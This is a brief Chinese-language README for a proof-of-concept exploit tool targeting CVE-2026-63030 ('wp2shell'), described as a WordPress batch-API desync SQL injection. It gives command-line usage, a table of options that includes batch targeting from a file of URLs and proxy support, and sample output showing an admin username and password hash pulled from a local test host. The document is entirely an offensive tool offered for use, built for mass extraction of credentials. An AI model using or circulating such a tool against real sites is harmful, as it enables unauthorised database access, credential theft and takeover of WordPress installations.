
CVE-2026-63030 (wp2shell) POC.
WordPress 批量 API 去同步 SQL 注入漏洞利用工具
通过 CVE-2026-63030 (wp2shell) 漏洞提取用户和密码哈希的概念验证工具。
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| 参数 | 描述 | 默认值 |
|---|---|---|
target | 单个目标 URL | - |
-l, --list | 包含目标列表的文件(每行一个) | - |
--prefix | 数据库表前缀 | wp_ |
--rest-route | 使用 ?rest_route= | 禁用 |
--timeout | 请求超时时间(秒) | 30 |
--proxy | HTTP 代理(兼容 Burp/ZAP) | 无 |
--max-len | 最大提取长度 | 255 |
[*] 扫描: http://127.0.0.1/
[*] 发现 1 个用户
[+] ID:1 用户:admin 哈希:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] 请求数: 553